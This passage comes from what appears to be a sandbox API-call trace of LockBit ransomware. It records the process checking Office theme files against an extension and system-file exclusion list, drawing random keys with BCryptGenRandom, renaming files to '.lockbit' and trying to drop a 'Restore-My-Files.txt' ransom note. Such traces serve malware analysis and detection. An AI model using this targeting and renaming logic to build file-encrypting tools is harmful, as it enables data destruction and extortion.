returned -1 [0192.041] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.041] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.042] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.042] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml.lockbit") returned 89 [0192.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apothecary.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0192.050] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.050] malloc (_Size=0x40068) returned 0x3df0008 [0192.050] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=965) returned 1 [0192.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0192.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0192.051] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0192.053] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.053] malloc (_Size=0xc8) returned 0x1fa2ed8 [0192.053] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc8, FileInformationClass=0xa) returned 0x0 [0192.054] free (_Block=0x1fa2ed8) [0192.054] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.054] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.054] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.054] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec9c9400, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xec9c9400, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aspect.xml", cAlternateFileName="")) returned 1 [0192.054] lstrcmpiW (lpString1=".", lpString2="Aspect.xml") returned -1 [0192.054] lstrcmpiW (lpString1="..", lpString2="Aspect.xml") returned -1 [0192.055] PathFindExtensionW (pszPath="Aspect.xml") returned=".xml" [0192.055] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.055] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.056] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Aspect.xml") returned 1 [0192.057] lstrcmpiW (lpString1="ntldr", lpString2="Aspect.xml") returned 1 [0192.057] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Aspect.xml") returned 1 [0192.057] lstrcmpiW (lpString1="bootsect.bak", lpString2="Aspect.xml") returned 1 [0192.057] lstrcmpiW (lpString1="autorun.inf", lpString2="Aspect.xml") returned 1 [0192.057] lstrcmpiW (lpString1="thumbs.db", lpString2="Aspect.xml") returned 1 [0192.057] lstrcmpiW (lpString1="iconcache.db", lpString2="Aspect.xml") returned 1 [0192.057] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.057] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml") returned=".xml" [0192.057] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.057] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.057] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.058] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.058] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml.lockbit") returned 85 [0192.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\aspect.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0192.059] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.059] malloc (_Size=0x40068) returned 0x1ff1e60 [0192.059] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=961) returned 1 [0192.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0192.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.061] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0192.061] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.066] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.066] malloc (_Size=0xc0) returned 0x1fa2ed8 [0192.066] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0192.067] free (_Block=0x1fa2ed8) [0192.067] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.067] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.067] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.067] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x211be00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x211be00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Austin.xml", cAlternateFileName="")) returned 1 [0192.067] lstrcmpiW (lpString1=".", lpString2="Austin.xml") returned -1 [0192.067] lstrcmpiW (lpString1="..", lpString2="Austin.xml") returned -1 [0192.067] PathFindExtensionW (pszPath="Austin.xml") returned=".xml" [0192.067] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.067] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.068] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Austin.xml") returned 1 [0192.069] lstrcmpiW (lpString1="ntldr", lpString2="Austin.xml") returned 1 [0192.069] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Austin.xml") returned 1 [0192.069] lstrcmpiW (lpString1="bootsect.bak", lpString2="Austin.xml") returned 1 [0192.069] lstrcmpiW (lpString1="autorun.inf", lpString2="Austin.xml") returned 1 [0192.069] lstrcmpiW (lpString1="thumbs.db", lpString2="Austin.xml") returned 1 [0192.069] lstrcmpiW (lpString1="iconcache.db", lpString2="Austin.xml") returned 1 [0192.069] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.069] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml") returned=".xml" [0192.069] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.069] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.069] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.070] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.071] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml.lockbit") returned 85 [0192.071] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\austin.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0192.072] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.072] malloc (_Size=0x40068) returned 0x3df0008 [0192.072] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=961) returned 1 [0192.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0192.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.073] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0192.073] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.080] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.080] malloc (_Size=0xc0) returned 0x1fa2ed8 [0192.080] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0192.081] free (_Block=0x1fa2ed8) [0192.081] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.081] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.081] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.081] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ead00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2ead00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Black Tie.xml", cAlternateFileName="BLACKT~1.XML")) returned 1 [0192.081] lstrcmpiW (lpString1=".", lpString2="Black Tie.xml") returned -1 [0192.081] lstrcmpiW (lpString1="..", lpString2="Black Tie.xml") returned -1 [0192.081] PathFindExtensionW (pszPath="Black Tie.xml") returned=".xml" [0192.081] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.082] lstrcmpiW 